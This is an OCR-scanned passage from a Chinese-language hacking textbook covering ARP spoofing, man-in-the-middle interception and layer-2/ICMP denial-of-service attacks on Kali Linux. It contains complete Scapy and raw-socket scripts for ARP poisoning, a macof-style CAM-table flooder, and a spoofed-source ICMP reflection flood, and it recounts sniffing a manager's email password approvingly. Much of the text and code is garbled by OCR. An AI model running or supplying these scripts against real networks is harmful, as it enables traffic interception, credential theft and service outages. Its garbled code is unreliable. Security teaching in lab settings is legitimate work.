attackGateway= Ether()/ARP (psrc= victimIP,pdst= gatewayIP) 

因为 ARP 缓存 表 中 表 项 都 有 生命 周期 ， 所 以 需要 不 断 对 两 个 主机 进行 欺骗 。 这 里 使 用 
循环 发 送 来 实现 这 个 功能 ，sendp 本 身 就 有 循环 发 送 的 功能 ， 使 用 inter 指定 间隔 时 间 ， 使 用 
loop=1 来 实现 循环 发 送 。 

sendp (attackTarget, inter=1, loop=1) 


男 外 ， 也 可 以 使 用 线程 的 方式 来 完成 这 个 任务 。 


while True: 
attackl= threading.Thread (target=sendp,args=( attackTarget, ) , kwargs= 
pinter" H 
attackl.start() 
attackl.join() 


接 下 来 编写 这 个 完整 的 程序 。 


import sys 

import time 

from scapy.all import sendp, ARP, Ether 

if len(sys.argv)!=3: 
print sys.argv[0] + ": <target><spoof_ip>" 
sys.exit (1) 

victimIP=sys.argv[1] 

gatewayIP=sys.argv[2] 

attackTarget=Ether () /ARP (psrc=gatewayIP,pdst=victimIP) 
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attackGateway= Ether () /ARP (psrc=victimIP,pdst=gatewayIP) 
sendp (attackTarget， inter=1, loop=1) 
sendp (attackGateway, inter=1l, loop=1) 


TE Aptana Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 ARPPoison .py 为 名 保存 起 来 ， 但 
是 这 个 程序 需要 两 个 参数 ， 可 以 在 Run Configurations 中 设置 本 次 要 攻击 的 目标 地 址 
“192.168.169.133” 和 网 关 “192.168.169.2” 为 运行 的 参数 。 执 行 之 后 ， 在 目标 主机 上 执行 
“ ping 192.168.169.2”"， 执 行 的 结果 是 “请 求 超时 ”。 另 外 ， 可 以 在 192.168.169.130 上 启动 
WireShark 将 过 滤器 设置 为 itmp， 如 图 8-24 所 示 。 


File Edit View Go Capture Analyze Statistics Telephony Wireless 
m 4 @ oE) E 2) S < + :书本 
A (icmp 


图 8-24 将 过 滤器 设置 为 icmp 
查看 捕获 192.168.169.133 上 的 通信 ， 如 图 8-25 所 示 。 


46 19 4245 1 4 Ech request 


168 169 1 ho (ping 
Ë 24 658569968 192.168 169.133 4 Echo (PING. 
71 29, 651592463 192.168.169.133 74 Echo (ping) request 


„74 bytes captured (592 bits) on interface 0 


ype TPvAT CH 
Internet Protocol Version 4, Src; 192.168.169.133, Dst: 192.108.109.2 
Internet Control Message Protocol 


图 8-25 ”捕获 到 本 来 只 有 192.168.169.133 才能 收 到 的 通信 


可 以 看 到 在 Kali Linux 2 上 截获 了 192.68.169.133 发 往 192.168.169.2 的 数据 包 ， 但 其 
实 这 个 数据 包 到 了 Kali Linux 2 虚拟 机 上 ， 这 一 点 从 Ethernet 层 上 的 Destination 上 可 以 看 
出 来 。 

但 是 这 里 存在 一 个 很 明显 的 问题 ， 就 是 192.68.169.133 发 出 去 的 数据 包 都 没有 得 到 回 
应 ， 这 是 因为 Kali Linux 2 并 没有 将 这 些 数 据 包 转 发 到 192.168.169.2 上 去 。 所 以 需要 在 主机 
上 开启 转发 功能 。 首 先 打开 一 个 终端 ， 开 启 的 方法 如 下 所 示 。 

root@kali: ~ # echo 1 >> /proc/sys/net/ipv4/ip_forward 

这 样 就 可 以 将 截获 到 的 数据 包 再 转发 出 去 ， 被 欺骗 的 主机 就 可 以 正常 上 网 了 ， 从 而 无 法 
察觉 到 受到 了 攻击 。 

例如 ， 现 在 目标 主机 上 执行 “ping 192.168.169.2”， 如 图 8-26 所 示 。 
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图 8-26 “ping 192.168.169.2” 


此 时 可 以 使 用 WireShark 来 捕获 这 些 其 他 主机 的 数据 包 了 。 可 以 看 到 Kali Linux 2 虚拟 
机 接收 到 这 两 台 主机 之 间 的 通信 ， 如 图 8-27 所 示 。 


111 44.321193299 192.168.169.133 192.168.169.2 ICMP 74 Echo (ping) request 
112 44.321404884 192.168.169.2 192.168.169.133 ICMP 74 Echo (ping) reply 


图 8-27 捕获 到 的 通信 
接 下 来 使 用 另外 一 个 库 文件 socket 来 实现 这 个 例子 。 相 比 Scapy，socket 是 一 个 更 为 通 
用 的 库 文件 ， 但 是 也 要 复杂 一 些 。 首 先 看 一 下 ARP 数据 包 的 格式 ， 和 以 前 不 同 ， 这 一 次 要 
精确 到 每 一 位 表示 的 含义 ， 如 图 8-28 所 示 


发 送 端 以 | 发 送 端 | 目的 以 太 


IP 地 址 | 网 地 址 


图 8-28 ARP 数据 包 的 格式 

使 用 socket 来 产生 一 个 数据 包 要 远 比 Scapy 麻烦 ， 按 照 如 图 8-28 所 示 这 个 数据 包 要 分 
成 如 下 多 个 部 分 

(1) 以 太 网 目的 地 址 ， 长 度 为 6 位 

(2) 以 太 网 源 地 址 ， 长 度 为 6 位 

(3 ) 帧 类 型 ， 长 度 为 两 位 

(4) 硬件 类 型 ， 长 度 为 两 位 

(5 ) 协议 类 型 ， 长 度 为 两 位 

(6 ) 硬件 地 址 长 度 ， 长 度 为 1 位 。 

(7) 协议 地 址 长 度 ， 长 度 为 1 位 。 

(8 ) op， 长 度 为 两 位 。 

(9) 发 送 端 以 太 网 地 址 ， 长 度 为 6 位 。 

(10) 发 送 端 他 地 址 ， 长 度 为 4 位 。 

(11) 目的 以 太 网 地 址 ， 长 度 为 6 位。 

(12) 目的 也 地 址 ， 长 度 为 4 位 。 

利用 这 个 库 实现 中 间 人 欺骗 的 原理 和 前 面 讲 过 的 一 样 ， 也 是 通过 向 目标 发 送 一 个 伪造 了 
的 ARP 请 求 数 据 包 来 实现 的 。 环 境 和 之 前 介绍 的 一 样 ， 源 他 地 址 : 192.168.169.2 (也 就 是 
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网 关 的 IP 地 址 )， 构 造 的 欺骗 数据 包 内 容 如 下 。 
(1) 源 卫 地址 : 192.168.169.2 (也 就 是 网 关 的 卫 地址)。 
(2) 源 硬 件 地 址 : 00:0c:29:12:dd:23 (也 就 是 Kali Linux 2 虚拟 机 的 硬件 地 址 )。 
(3) 目标 卫 地 址 : 192.168.169.133 (要 欺骗 主机 的 了 P 地址 )。 
(4) 目标 硬件 地 址 : 00:0c:29:2D:7F:89。 
(5) ARP 类 型 : request。 
那么 可 以 按照 如 下 来 填充 这 个 数据 包 。 
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(1) 以 太 网 目的 地 址 : 00:0c:29:2D:7F:89， 这 个 表示 要 欺骗 的 主机 的 硬件 地 址 ， 也 可 以 


是 广播 地 址 ff: ff: ff-ff: ff: ff. 
(2) 以 太 网 源 地 址 : 00:0c:29:12:dd:23， 这 是 本 机 的 硬件 地 址 。 
(3 ) 帧 类 型 : 0x0806 表示 ARP 类 型 ， 使 用 两 位 十 六 进 制 表示 为 \x08\x06。 
(4) 硬件 类 型 : 1 表示 以 太 网 ， 使 用 两 位 十 六 进 制 表示 为 \x00\x01。 
(5 ) 协议 类 型 ，8 表示 IPv4， 使 用 两 位 十 六 进 制 表示 为 \x08\x00。 
(6) 硬件 地 址 长 度 : \x06, XIR 6 位 的 硬件 地 址 。 
(7) 协议 地 址 长 度 : \x04， 表 示 4 位 的 卫 地 址 。 
(8 ) op: 1 表示 请 求 ，2 表示 回应 ， 使 用 两 位 十 六 进 制 表示 为 \x00\x01。 
(9 ) 发 送 端 以 太 网 地 址 : 00:0c:29:12:dd:23 。 
(10) 发 送 端 IP 地 址 : 192.168.169.2。 
(11) 目的 以 太 网 地 址 : 00:0c:29:2D:7F:89。 
(12) Hñ IP 地址 : 192.168.169.133。 


在 构造 数据 包 的 时 候 需 要 注意 一 点 ， 网 络 中 传输 他 地 址 等 数据 要 使 用 网 络 字 节 顺序 ， 
它 与 具体 的 CPU 类 型 、 操 作 系 统 等 无 关 ， 从 而 可 以 保证 数据 在 不 同 主机 之 间 传 输 时 能 够 被 


正确 解释 。Python socket 模块 中 包含 一 些 有 用 的 了 P 转换 函数 ,说 明 如 下 。 


( 1 ) socket.inet_aton(ip_string) : 将 IPv4 的 地 址 字符 串 (例如 192.168.10.8 ) 转换 为 32 位 


打包 的 网 络 字 节 。 


(2 ) socket.inet_aton(packed_ip) : 转换 32 位 的 IPv4 网 络 字 节 为 IP 地 址 的 标准 点 号 分 隔 


字符 串 表示 。 


这 里 需要 使 用 socket.inet_aton(ip_string) 将 IP 地 址 转换 之 后 才能 发 送出 去 ， 所 以 定义 一 


下 这 个 数据 包 的 格式 内 容 。 


srcMAC="00:0c:29:12:dd:23" 
dstMAC="00:0c:29:2D:7F:89" 
code=' \x08\x06' 

htype = '\x00\x01' 
protype = '\x08\x00' 
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hsize = '\x06' 

psize = '\x04' 

opcode = 'Ax00Nx02' 
gatewayIP = '192.168.169.2' 
VictimIP = "192.168.169.133" 


下 面 将 这 些 内 容 组 成 一 个 数据 包 


packet=sr 


CMAC+dstMAC+ code+htype+protype+hsize+psize+opcode+srcMAC+socket.inet_ 


aton (gatewayIP)+ dstMAC+socket.inet_aton(victimIP) 


完整 的 程序 如 下 所 示 


import so 
import st 
import bi 
s=socket. 
s.bind((" 
srcMAC='N 
dstMAC='N 
code='\x0 
htype = ' 
protype = 
hsize = ' 
psize = ' 
opcode = 

gatewayIP 
victimIP 

packet= 


cket 
ruct 
nascii 
socket (socket.PF_PACKET, socket .SOCK_RAW, socket .ntohs (0x0800)) 
eth0", socket .htons (0x0800) ) ) 
x00\x0c\x29\x23\xle\xf4' 
x00\x0c\x29\x2D\x7F\x89' 
8\x06' 
\x00\x01' 

'\x08\x00' 
\x06' 
Xz04' 

'\x00\x01'" 

= "192.168.169.2" 
= "192.168.169.133" 

dstMAC+srcMAC+ code+ htype+ protype+ hsize+ psize+ opcode+ 


srcMAC+socket.inet_aton (gatewayIP)+ dstMAC+socket.inet_aton (victimIP) 


这 个 程序 执行 之 后 ， 在 目标 


功 ， 


while 1: 


s.sen 


在 Aptana 


d(packet) 


Studio 3 中 完成 这 个 程序 ， 将 这 个 程序 以 “ARPPoison2.py” 为 名 保存 起 来 ， 


机 上 查看 ARP 缓存 表 ， 如 图 8-29 所 示 。 


C:NJsersSñdministrator>arp -a 


92.168.169.133 ——— Bxb 


DB-Bc 
88-8c 


图 8-29 执行 完 该 程序 之 后 的 ARP 缓存 表 


可 以 看 到 网 关 192.168.169.2 的 硬件 地 址 已 经 变 成 192.168.169.130， 这 表示 ARP 欺骗 成 


现在 目标 主 


机 发 往 网 关 的 流量 就 都 被 劫持 到 Kali Linux 2 虚拟 机 上 。 
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小 结 


本 章 中 介绍 了 如 何在 网 络 中 进行 嗅 探 和 欺骗 ， 这 是 作者 认为 最 为 有 效 的 一 种 攻击 方式 。 
几乎 所 有 的 网 络 安全 机 制 都 是 针对 外 部 的 ， 而 极 少 会 防御 来 自 内 部 的 攻击 ， 因 此 在 网 络 内 部 
进行 嗅 探 和 欺骗 的 成 功率 极 高 。 

在 很 多 经 典 的 渗透 案例 中 也 都 提 到 了 这 种 攻击 方式 ， 例 如 ， 国 内 最 知名 的 一 家 I 企业 
的 安全 主管 就 曾经 提 到 过 ， 他 在 进入 企业 后 做 的 第 一 件 事情 就 是 利用 网 络 监听 截获 了 部 门 领 
导 的 电子 邮箱 密码 。 另 外 ， 随 着 现在 硬件 的 发 展 ， 也 出 现 了 有 人 使 用 装载 了 树 莓 派 的 无 人 机 
进入 到 受 保护 的 区 域 ， 然 后 连接 到 了 无 线 网 络 进行 网 络 监听 的 事件 。 
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在 学 校 食堂 用 餐 的 时 候 ， 经 常会 有 等 待 餐桌 的 经 历 。 学 校 食堂 提供 的 餐桌 只 有 几 百 个 ， 
往往 有 人 要 排 着 队 等 待 餐桌 。 如 果 使 用 了 餐桌 的 人 迟 迟 不 离开 ， 那 么 后 面 的 人 就 会 越 来 越 
多 ， 学 校 食堂 提供 的 餐桌 也 就 无 法 对 外 提供 正常 的 服务 了 。 当 然 平时 出 现 这 种 情况 的 主要 原 
因 是 因为 学 校 食堂 提供 的 餐桌 数量 不 够 ， 只 要 增加 餐桌 的 数量 就 可 以 解决 这 个 问题 了 。 但 是 
如 果 是 有 人 故意 为 之 ， 例 如 有 大 量 并 不 是 真 的 在 吃饭 的 人 却 占 着 餐桌 不 离开 ， 就 会 导致 其 他 
人 都 无 法 在 这 个 食 党 就餐。 那么 这 时 食堂 实际 上 已 经 不 能 正常 对 外 提供 服务 了 ， 这 种 故意 占 
用 某 一 系统 对 外 服务 的 有 限 资源 从 而 导致 其 无 法 正常 工作 的 行为 就 是 拒绝 服务 攻击 。 

拒绝 服务 攻击 即 是 攻击 者 想 办 法 让 目标 机 器 停止 提供 服务 ， 是 黑客 常用 的 攻击 手段 之 
一 。 其 实 对 网 络 带宽 进行 的 消耗 性 攻击 只 是 拒绝 服务 攻击 的 一 小 部 分 ， 只 要 能 够 对 目标 造成 
麻烦 ， 使 某 些 服务 被 暂停 甚至 主机 死机 ， 都 属于 拒绝 服务 攻击 。 拒 绝 服务 攻击 问题 也 一 直 得 
不 到 合理 的 解决 ， 究 其 原因 是 因为 网 络 协议 本 身 的 安全 缺陷 ， 从 而 拒绝 服务 攻击 也 成 为 攻击 
者 的 终极 手法 。 

实际 上 拒绝 服务 攻击 并 不 是 一 个 攻击 方式 ， 而 是 一 类 具有 相似 特征 的 攻击 方式 的 集合 。 
这 类 攻击 方式 分 布 极 广 ， 黑 客 可 能 会 利用 TCP/IP 协议 层 中 数据 链 路 层 、 网 络 层 、 传 输 层 和 
应 用 层 各 种 协议 漏洞 发 起 拒绝 服务 攻击 。 下 面 按照 这 些 协议 的 顺序 来 介绍 一 下 各 种 拒绝 服务 
攻击 以 及 实现 的 方法 。 
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9.1 数据 链 路 层 的 拒绝 服务 攻击 


首先 查看 在 数据 链 路 层 发 起 的 拒绝 服务 攻击 方式 ， 很 多 人 对 这 种 攻击 方式 很 陌生 ， 它 的 
攻击 目标 是 二 层 交 换 机 。 这 种 攻击 方式 的 目的 并 不 是 要 二 层 交 换 机 停止 工作 ， 而 是 要 二 层 交 
换 机 以 一 种 不 正常 的 方式 工作 。 

很 多 人 可 能 对 这 种 说 法 感到 困惑 ， 什 么 是 交换 机 不 正常 的 工作 方式 呢 ? 现在 的 网 络 设 
备 大 都 采用 了 交换 机 ， 但 是 却 并 非 从 有 网 络 的 时 候 就 使 用 这 个 设备 。 早 期 网 络 使 用 的 是 一 种 
名 为 集线器 的 设备 ， 如 果 读 者 阅读 过 一 些 比较 老 旧 的 黑客 书籍 ， 那 里 面 大 都 会 提 到 一 种 使 用 
sniffer 来 监听 整个 局 域 网 的 方法 。 这 种 方法 极为 简单 ， 只 需要 网 卡 支持 混杂 模式 即 可 。 但 实 
际 上 如 果 你 现在 真 的 按照 这 种 方法 ， 就 会 发 现 其 实 除 了 本 机 的 通信 之 外 将 会 一 无 所 获 。 这 是 
怎么 回 事 呢 ? 

产生 这 种 情况 的 原因 在 于 多 年 前 局 域 网 进行 通信 的 设备 大 都 是 集线器 ， 而 现在 使 用 的 
却 是 交换 机 。 这 两 种 设备 的 作用 相同 ， 都 可 以 实现 局 域 网 两 个 主机 之 间 的 通信 。 但 是 工作 原 
理 却 不 同 ， 简 单 来 说 ， 集 线 器 中 没有 任何 的 “学 习 ” 和 “记忆 ”能 力 。 假 设 一 个 局 域 网 中 有 
100 台 计 算 机 ， 这 些 计算 机 都 用 网 线 连 接 到 集线器 的 网 络 接口 上 ， 其 中 每 一 个 接口 对 应 一 台 
计算 机 。 当 其 中 的 A 计算 机 在 向 B 计算 机 发 送 数据 包 时 ， 需 要 先 将 数据 包 发 给 集线器 ， 由 
集线器 负责 转发 。 可 是 当 集线器 收 到 这 个 数据 包 时 并 不 知道 哪个 接口 连接 到 了 B 计算 机 ， 所 
以 集线器 会 大 量 地 复制 这 个 数据 包 ， 然 后 向 所 有 的 接口 都 发 送 一 份 这 个 数据 包 的 副本 。 结 
就 是 局 域 网 中 的 所 有 计算 机 都 收 到 了 这 份 数据 包 ， 每 台 计算 机 上 面 的 网 卡 会 查看 这 台数 据 包 
上 的 目的 信息 ， 如 果 该 目的 并 非 本 机 ， 就 会 丢弃 这 个 数据 包 。 这 样 就 只 有 B 计算 机 才 会 接 
收 并 处 理 这 个 数据 包 。 但 是 这 种 机 制 并 不 能 确保 数据 包 的 保密 性 。 就 像 之 前 提 到 的 那样 ， 局 
域 网 中 的 任何 一 台 主 机 只 需要 将 网 卡 设置 为 混杂 模式 ， 然 后 使 用 抓 包 软 件 (例如 之 前 提 到 的 
sniffer)， 就 可 以 捕获 到 网 络 中 的 所 有 通信 数据 包 。 

目前 的 局 域 网 中 几乎 已 经 见 不 到 了 集线器 的 踪影 了 ， 取 而 代 之 的 是 交换 机 。 相 比较 集 线 
器 ， 交 换 机 则 多 了 “记忆 ”和 “学 习 ” 的 功能 。 这 两 个 功能 是 通过 交换 机 中 的 CAM 表 实 现 
9， 这 张 表 中 保存 了 交换 机 中 每 个 接口 所 连接 计算 机 的 MAC 地 址 信息 ， 这 些 信 息 可 以 通过 
动态 学 习 来 获得 。 

这 样 ， 当 局 域 网 中 的 A 计算 机 向 B 计算 机 发 送 数 据 包 时 ,会 先 将 这 个 数据 包 发 送 到 交 
换 机 ， 由 交换 机 转发 。 交 换 机 在 收 到 这 个 数据 包 时 会 提取 出 数据 包 的 目的 MAC 地 址 ， 并 查 
WJ CAM 表 ， 如 果 能 查找 到 对 应 的 表 项 ， 就 将 数据 包 从 找到 的 接口 发 送出 去 。 如 果 没有 找到 ， 
再 将 数据 包 向 所 有 接口 发 送 。 在 转发 数据 包 的 时 候 ， 交 换 机 还 会 进行 一 个 学 习 的 过 程 ， 交 
换 机 会 将 接收 到 数据 包 中 的 源 MAC 地 址 提取 出 来 ,并 查询 CAM 表 ， 如 果 表 中 没有 这 个 源 
MAC 地 址 对 应 接口 的 信息 ， 则 会 将 这 个 数据 包 中 的 源 MAC 地 址 与 收 到 这 个 数据 包 的 接口 
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u oss 表 项 插入 到 CAM 表 中 。 U. 习 是 一 个 动态 的 过 程 ， 每 个 表 项 并 不 是 固定 的 ， 

是 都 有 一 个 定时 器 (通常 是 5 分 钟 )， 从 这 个 表 项 插入 到 CAM 表 开 始 起 ， 当 该 定时 器 递减 
ea 该 CAM 项 就 会 被 删除 。 

这 个 机 制 保证 了 采用 交换 机 设备 的 局 域 网 的 数据 包 传送 都 是 单 播 的， 但 是 CAM 表 的 容 
量 是 有 限 的 ， 如 果 短 时 间 内 收 到 大 量 不 同 源 MAC 地 址 发 来 的 数据 包 ，CAM 表 就 会 被 填 满 
当 填 满 之 后 ， 新 到 的 条 目 就 会 覆盖 前 面 的 条 目 。 这 样 当 网 络 中 正常 的 数据 包 到 达 交 换 机 之 
后 ， 而 交换 机 中 CAM 表 已 经 被 伪造 的 表 项 填 满 ， 无 法 找到 正确 的 对 应 关系 ， 只 能 将 数据 包 
广播 出 去 。 这 时 受到 攻击 的 交换 机 实际 上 已 经 退化 成 了 集线器 了 。 这 时 黑客 只 需要 在 自己 的 
计算 机 上 将 网 卡 设置 为 混杂 模式 ， 就 可 以 监听 整个 网 络 的 通信 了 

这 种 攻击 其 实 也 很 简单 ， 只 需要 伪造 大 量 的 数量 包 发 送 到 交换 机 ， 这 些 数据 包 中 的 源 
MAC 地 址 和 目的 MAC 地 址 都 是 随机 构造 出 来 的 ， 很 快 就 可 以 将 suu CAM 表 填 满 

Kali Lanna 2 pip: 了 很 多 可 以 完成 这 个 任务 的 工具 ， 接 下 来 介绍 一 个 专门 用 来 完成 这 

种 攻击 的 工具 -macof， 这 个 工具 的 使 用 方法 很 简单 ， 下 面 给 出 了 这 个 工 mt 


Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport][-i interface] [-n 
times] 


在 实际 应 用 中 ， 这 里 面 的 参数 只 有 -1 是 会 使 用 到 的 ， 这 个 参数 用 来 指定 发 送 这 些 伪造 数 
据 包 的 网 卡 

使 用 macof 的 方法 很 简单 ， 在 Kali Linux 2 中 打开 一 个 终端 ， 然 后 输入 macof 即 可 启动 
这 个 工具 


root@kali: ~ # macof 


这 个 工具 的 工作 界面 如 图 9-1 所 示 


# macof 
73:91:70 10:95 f2 0.0.0.0.290! 


图 9-1 macof 向 网 络 发 送 的 数据 包 
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交换 机 在 遭 到 攻击 之 后 ， 内 部 的 CAM 表 很 快 就 被 填 满 。 交 换 机 退化 成 集线器 ， 会 将 收 
到 的 数据 包 全 部 广播 出 去 ， 从 而 无 法 正常 向 局 域 网 提供 转发 功能 ， 实 现 的 过 程 很 简单 。 

第 一 步 : 构造 随机 MAC MIP, scapy 模块 中 的 RandMAC( 和 RandIP() 可 以 很 方便 地 实 
现 这 一 点 ， 也 可 以 生成 固定 网 段 卫 ， 如 RandIP("192.168.1.*")。 


from scapy.all import * 
while(1): 
packet=Ether (src=RandMAC () , dst=RandMAC () ) /IP (src=RandIP(),dst=RandIP())/ 
ICMP () 
time.sleep(0.5) 
sendp (packet) 
print packet .summary () 


执行 的 结果 如 图 9-2 所 示 。 


© Console x B root@kali: ~ © Problems Fù PyUnit 


“ x 9 Q, a RDE = 
<terminated> 192.168.169.2 


Ether / IP / ICMP 45.127.154.90 > 181.247.224.126 echo-request 0 
Ether / IP / ICMP 190.121.85.115 > 233.10.65.25 echo-request 0 
Ether / IP / ICMP 35.176.42.115 > 239.205.52.24 echo-request 9 
Ether / IP / ICMP 112.254.153.94 > 94.6.108.4 echo-request 0 
Ether / IP / ICMP 147.42.90.254 > 32.134.89.244 echo-request 9 
Ether / IP / ICMP 85.84.92.116 > 170.221.114.133 echo-request 0 
Ether / IP / ICMP 210.236.172.81 > 90.103.204.170 echo-request 6 
Ether / IP / ICMP 189.236.111.207 > 6.224.59.98 echo-request 0 


图 9-2 完全 随机 生成 的 数据 包 


from scapy.all import * 

while(1): 
packet=Ether (src=RandMAC () ,dst=RandMRC () ) 
time.sleep(0.5) 
print packet.summary() 


执行 的 结果 如 图 9-3 所 示 。 


© Console x | 画 root@kali:~ © Problems Fù PyUnit 
= x 9 Q & a BOG 
<terminated> 192.168.169.2 


17:7e:87:bb:3b:70 > c3:a5:a5:88:7f:22 (0x9000) 

i (0x9000) 
(0x9000) 
(0x9000) 
(0x9000) 
(0x9000) 
(0x9000) 
(0x9000) 
(0x9000) 
10:07:cb:22:ca:08 (0x9000) 


> 
> 
> 
> 
> 
> 
> 
$ 
> 


:29:3d:15:f6:3d 


图 9-3 向 网 络 发 送 随机 MAC 地 址 的 数据 包 


from scapy.all import * 
while(1): 
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packet=IP (src=RandIP () ,dst=RandIP ()) /ICMP () 
time.sleep (0.5) 
print packet .summary () 


执行 的 结果 如 图 9-4 所 示 。 


EJ Console x [B root@kali: ~ DProblems fb PyUnit 
= X 5 Q. R a BE 
<terminated> 192.168.169.2 


IP / ICMP 247.102.52.226 > 123.143.33.214 echo-request 0 
IP / ICMP 47.38.242.236 > 78.126.81.37 echo-request 9 

IP / ICMP 253.161.195.158 > 244.177.236.249 echo-request 6 
IP 
IP 
IP 
IP 
IP 


ICMP 13.112.255.77 > 41.227.111.247 echo-request 6 
ICMP 68.252.235.1 > 128.10.248.127 echo-request 0 
ICMP 34.73.252.183 > 224.78.57.94 echo-request 0 
ICMP 94.172.121.150 > 187.200.7.155 echo-request 0 
ICMP 0.83.61.184 > 57.221.187.172 echo-request 9 


图 9-4 向 网 络 发 送 随机 IP 地 址 的 数据 包 
第 二 步 : 数据 包 中 包含 制定 的 源 IP 和 MAC， 那 么 交换 机 就 会 记录 ， 例 如 ARP 包 。 


Ether (src=RandMAC () , dst="FF:FF:FF:FF:FF:FF") /ARP (op=2, scr="0.0.0.0",hwdst="FF: 
FF:FF:FF:FF:FF")/Padding (load="X"*18) 


或 者 ICMP 包 : 
Ether (src=RandMAC () , dst=RandMAC () ) /IP (src=RandIP () ,dst=RandIP () ) /ICMP () 


模拟 macof 的 完整 代码 如 下 。 


~~~~~~~~ 


#!/usr/bin/python 

import sys 

fromscapy.all import * 

import time 

iface="eth0" 

iflen(sys.argv)>=2: 
iface=sys.argv[1] 

while(1): 
packet= Ether (src=RandMAC () ,dst=RandMAC()) / 
IP(src=RandIP () ,dst=RandIP()) / ICMP() 
time.sleep (0.5) 
sendp (packet, iface=iface,loop=0) 
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位 于 网 络 层 的 协议 包括 ARP、IP 和 ICMP 等 ， 其 中 ，ICMP 主要 用 来 在 卫 主机、 路 由 
器 之 间 传 递 控 制 消 息 。 平 时 检测 网 络 连通 情况 时 使 用 的 Ping 命令 就 是 基于 ICMP 的 。 例 如 ， 
希望 查看 本 机 发 送 的 数据 包 是 否 可 以 到 达 192.168.1.101， 就 可 以 使 用 如 图 9-5 所 示 的 Ping 


命令 。 
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root@kali: ~ Boe 


Fie Edit Search Terminal Help 
ng 192.168.1.101 
PING 1 101 (192.16 

bytes from 1 


图 9-5 使 用 Ping 命令 向 目标 发 送 数据 包 
从 图 9-5 中 可 以 看 出 ， 发 送 的 数据 包 得 到 了 应 答 数据 包 ， 这 说 明 192.168.1.101 收 到 了 发 
出 的 数据 包 ， 并 给 出 了 这 个 过 程 遵守 了 ICMP 的 规定 。 上 面 例 子 中 使 用 的 Ping 就 是 
IMCP 请 求 ( Type=8 )， 收 到 的 回应 就 是 ICMP 应 答 ( Type=0 )， 一 台 主 机 向 一 个 节点 发 送 一 
个 Type=8 的 ICMP 报 文 ， 如 果 途 中 没有 异常 (例如 ， 被 路 由 器 丢弃 、 目 标 不 回应 ICMP 或 传 
输 失 败 )， 则 目标 返回 Type=0 的 ICMP 报 文 ， 说 明 这 人 台 主 机 存在 
但 是 目标 主机 在 处 理 这 个 请 求 和 应 答 时 是 需要 消耗 CPU 资源 的 ， 处 理 少量 的 ICMP 请 
求 并 不 会 对 CPU 的 运行 速度 产生 影响 ， 但 是 大 量 的 ICMP 请 求 呢 ? 
仍然 使 用 Ping 命令 来 尝试 一 下 。 这 次 将 ICMP 数据 包 设 置 的 足够 大 ，Ping 命令 发 送 的 
数据 包 大 小 可 以 使 用 -1 来 指定 (这 个 值 一 般 指定 为 65 500 )， 这 样 构造 好 的 数据 包 被 称 作 
“死亡 之 Ping”， 因 为 早期 的 系统 无 法 处 理 这 么 大 的 ICMP 数据 包 ， 在 接收 到 这 种 数据 包 之 后 
就 会 死机 ， 现 在 的 系统 则 不 会 出 现 这 种 问题 ， 但 是 可 以 考虑 使 用 这 种 方式 向 目标 连续 地 发 送 
这 种 “死亡 之 Ping” 来 消耗 目标 主机 的 资源 ， 如 图 9-6 所 示 


root@kali: ~ 


Fle Edit View Search Terminal Help 
# 32.168.1.101 -l 65501 

prol cvbuf is not el 

101 (192.168.1.101) 


图 9-6 向 目标 发 送 长 度 为 65500 的 数据 包 
只 向 目标 发 送 了 488 个 ICMP 数据 包 就 停止 了 ， 实 际 上 发 送 再 多 的 数据 包 效 果 也 并 
apayka 要 是 现在 的 操作 系统 和 CPU 完全 有 能 力 处 理 这 个 数量 级 的 数据 包 。 那 
么 接 下 来 呢 ? 既然 对 方 能 够 承受 这 个 速度 的 数据 包 了 ， 那么 这 里 的 拒绝 服务 攻击 也 就 没有 效 
果 了 ， 必 须 想 办 法 提高 发 送 到 目标 的 数据 包 的 数量 ， 主 要 有 两 个 办 法 ， 一 是 同时 使 用 多 台 计 
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算 机 发 送 ICMP 数据 包 ， 二 是 提高 发 送 的 ICMP 数据 包 的 速度 。 

另外 ， 除 了 像 上 面 这 种 使 用 本 机 地 址 不 断 地 向 目标 发 送 ICMP 包 的 方法 之 外 ， 还 有 两 种 
方法 ， 一 是 使 用 随机 地 址 不 断 向 目标 发 送 ICMP 包 ， 二 是 向 不 同 的 地 址 不 断 发 送 以 攻击 目标 
的 下 地 址 为 发 送 地 址 的 数据 包 。 这 种 攻击 模式 里 ， 最 终 淹没 目标 的 洪水 不 是 由 攻击 者 发 出 
的 ， 也 不 是 伪造 IP 发 出 的 ， 而 是 正常 通信 的 服务 器 发 出 的 。 

除了 前 面 使 用 的 RandIPO， 还 可 以 使 用 下 面 的 方法 模拟 出 一 个 随机 IP 地 址 。 


i.src = "%i.%i.%i.%i" % (random.randint (1,254),random.randint (1,254),random. 
randint (1,254),random.randint (1,254)) 
id.dst="" 


send (IP (dst="1.2.3.4") /ICMP()) 
下 面 给 出 了 一 个 完整 的 攻击 程序 。 


import sys, random 
from scapy.all import send, IP, ICMP 
if len(sys.argv) < 2: 
print sys.argv[0] + " <spoofed_source_ip> <target>" 
sys.exit(0) 
while 1: 
pdst= "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254), 
random.randint (1,254),random.randint (1,254)) 
psťē="1:1.1:1" 
send (IP (src=psrc, dst=pdst) /ICMP() ) 


使 用 WireShark 来 捕获 发 出 的 数据 包 ， 可 以 看 到 快速 地 以 1.1.1.1 向 各 个 地 址 发 送 ICMP 
请 求 ， 这 个 地 址 在 收 到 了 请 求 之 后 ， 很 快 就 会 向 1.1.1.1 发 回应 答 。 这 就 是 第 三 种 攻击 方式 ， 
如 图 9-7 所 示 。 


Alimp 
No. Time Source Destination Protocol Length Info 
42 

11 77 695874007 ICMP 42 Echo (p. 
12 77836144923 ICMP 42 Echo (ping) request 
13 77.895210317 ICMP 42 Echo (ping) request 
14 77 .947388247 ICHP 42 Echo (ping) request 
35 77.995793071 ICHP 42 Echo (ping) request 
16 78.059204725 42.71.59.49 ICMP 42 Echo (ping) request 
17 78.123865028 129.246.221.87 ICMP 42 Echo (ping) request 
18 78 -186156292 118.71.17.37 ICMP 42 Echo (ping) request 
19 78 .255759936 105.226.154.241 ICMP 42 Echo (ping) request 
20 78.333183241 139.54.165.176 ICMP 42 Echo (ping) request 
21 78404851981 42.161.215.156 ICMP 42 Echo (ping) request 
22 78.469067592 82.149 .217.182 ICMP 42 Echo (ping) request 
23 78.539226457 133.238.83.43 ICMP 42 Echo (ping) request 
24 78.608732646 230.12.253.53 ICMP 42 Echo (ping) request 
25 78663372344 248.233.210.69 ICMP 42 Echo (ping) request 
20 78.728211046 81.157.243.120 ICMP 42 Echo (ping) request 
